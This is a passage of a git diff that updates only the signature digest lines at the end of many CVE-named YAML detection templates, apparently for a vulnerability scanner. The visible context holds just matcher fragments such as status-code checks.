4b0a00483046022100d08ee0b34d00de0f708b66afce0068a3c729765c2c235beed4cb6bc2d2889c08022100feeafc320d32e350c23c89501559b0f39ec71a6e4719a0a1a295b39a96b420c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f9a12bda6a3bad2c10eb6a7006e9763560a3051e4c9cd3d425015f957b58cbd0221009c1117635502a2220b03c2019eaa11624d6881ae09e33d81ca879ab20842ca85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 443931802e8..0053bfc2ec1 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ec31552aee2178dabe62b3ce36e151140001d2c735955d34f5d743821cd17db0220456ce259b303cb266f47239e0dc96407f65b802075a96a80ab43707dea33726b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ceb042b4dfc0b79ab3476d8b21f7a606b6337b8aadffee7ec0f0995e58f9c66a02201b9fb383ea6944e421f1658eca733b0a5033548b26db51dcc4334c1bcb234917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index b1d6a8c8c63..8bab9821703 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022022456f69289a71abc27d978b266aa6d40dc99edaeb032ad61c1e6fb061b997fa0221008e162cc890b6d90a02c3b73cf5b703305fa33d956dc067e4f0ef6004f1613c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfb5e6850f3cb0b06eee7ccc6b1c41034f1f8589ad931a77c19fd71a680987b00220090c70b5075b38fcfefdf10ce976f88e4e0735da9d1e05dde6da36c872f2a7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index a56aa023644..8f0382a2b51 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c2e3c0e102775082f2d7090e14a666e54ed61ecb55b351b88f35d6f30546a733022100e88847ec72cc1395a1b97f79d814f3681e16a2e3aa492667a2c663c4dc6fa19b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c818a36ab224e5ff7a21513bf7bec32297f58ba5708ebf288014085a685caff022100ac5911f229bf81d85d7b931c4b19d63a55202bcf0edaba353c7b3091df5e2000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 1fe93d8b2bd..d44c64fce08 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e8482e1454a3de60c4074dae70545170387e0ad1fb24bc2c2907a7003e5f1df4022100c776b9b2fff8d1794e4d7f9c423c63210900987de5953955614acc4ad15c0039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c8b137ac857a21440c60ab332aa696b9898960f4978fa08bee74c81a735f85d022100ac363261dd2c88d0c2b0ca986d42f9bdc452962731c9ba3f2573b9d92c73ff22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 4f8b56f5692..b18f8e59e67 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b417f41a95ef0aa98c408de313af3c004c360a1d380973af14f9550f96155791022100f7710fb7d9eace8960534cf7091c4e0c1a0349a5adb4ac60b7235e490eb64162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220575641683a855fc29bf393d559b64ebdafb33d46d1d6d2fc91ab6cc010ae2f4a02203dbe9909e2dac381295001511f763c23c395ecc30e0c07d825611b668ffb96bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index fba5640158d..6b4e706e7a0 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -59,4 +59,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022024035d4338ae063567e11feb8a3d22aa4f59506bc4dc0a3ad6da236c6e297f5902205139924bceab65f659249589e698890bbf53a06ad2577340983c6d7996676d8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4808eda3906d64c3f36fbd3d611f0a4a591c7db1ec26e741bb3d6e8cd9edfac022100d2dbea40037fe530a41f011cccee337db8fa83bf2111178b9f0c3811082cfccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 51b9ae0d9a2..6dc7f58a855 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -66,4 +66,4 @@ http: - '(sid:[a-z0-9,;:]+)' internal: true part: body -# digest: 4a0a00473045022100b39e7ff44659f9d4eea3dab78cd3bc6a7e96a263c2605dc7b1fc978d634393c90220330ac22b3ec06975d56f3c1f2e0debc36664df9bc9eca3d2d0434427e4f829fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200434df467cff0a682b0212ef81272c1300e849907cd70a5f3397dbc2ee5294f102200253cb18b13d72f07533b2f4ffb3b1aab7d0fe532889000a98b62890cf10c836:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 235220293ce..ad4730aa3ce 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210090a4776c191eed6b3bdf34d2a84f94a4f6bd80ed35647306ddd46cb266d12015022012f7f45d03ae259b2d59993882d6ff9ea823a91c13bd9a3b1dbc080b42a30bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1be796c351d167bc6448a26b8699228e1b11c5720f71e3d25d9a552f65fa5af022010091fb761eacb039bb9b6615771fabf558eac0e30cfb935967a753ca4b649dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index f60d4c35734..9d069852181 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 500 -# digest: 490a004630440220774bee683eba874a567aeb75d3b16c5d82609f32f7277b75e20446425360f99a022054543b70350b22f420bd1081b8ce6b47246cf25438672ebc91d79c9c79c29642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aba80658f092e35c58cbb7b343d9c98e08118b4bf730a47ebe5b23e5521e589202203c9c961b0e14e84225dd36b563bef863e39dde2f441cdb22fa927a47628165d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 3f5ae00de84..6781cc4576c 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022052c6665d3660fc63f59de7aa1aa556675f4faae1b28ae671c112624887b3684f022027c4115ed6fe7637238185eb3e30c3e01401bc33b27e1aba8a23fc0d2d71979a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057a3df3c41a9ee4397a48d4bc49e873d6ccbb28f30c760ab5cb9351ea735b448022100e2e563cb77c29dcbd2a8ab00995ce6279b78e5760e079a65cde631e37b98dec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 34f22507328..f61199f7373 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -58,4 +58,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "")' condition: and -# digest: 4a0a0047304502206e0dfe81f87df8bffcd7e353b43acc7b9cba2fa21500b24ff30ae9a45a2b4988022100c58a0c389a3bb3367536ae3babbcd833d8e9f71af9ce4cda52cb093e8f473f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220122559a9f3498ed3b0cac7699581931277a1ef8e4ff9423431ae8a6f8598f67102202f214aacf1d6ac6f7bdd4cf472ccce21f3e9792ef13e6aac331785fabd723ce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index e3c99ad3ce1..38fd1fc773b 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022065ebc7b0e2861ec573cae1279d53feb93258cfe82c78f827a07a1410416e291e022100bc19cda3511f5f7614ec9c6a3ec0bee27f9bc6c051fb492549c076ee524f2c0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e81e94c458ac70792753cc38d9d1b4a0a2f06ddae6a11c2171e281a9f4097bdc022100c9ed5fcebdafa2849c1b0cc8cebb630b8f99b5a493c6ce280c62e7377a01a185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 4298abc9093..0ec2f719638 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022014ac3678cd7e1641734a013d4da42686dc3f317319a18c78bff898735e3138d30220631de7920a2ed2837b3f616e14afbc0024fe1b44e59492e7b02c5c71721075f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e650de06fb6bf7769fa8650b4b91b9c6bd2251e7036e5a79f2c8235ed4aa1ca30220381da86cec5ba8312229812f22303a4f2d9ba23c3f399daf9a64117ccfa98da9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index 5869098bdbf..54165e5df8c 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, "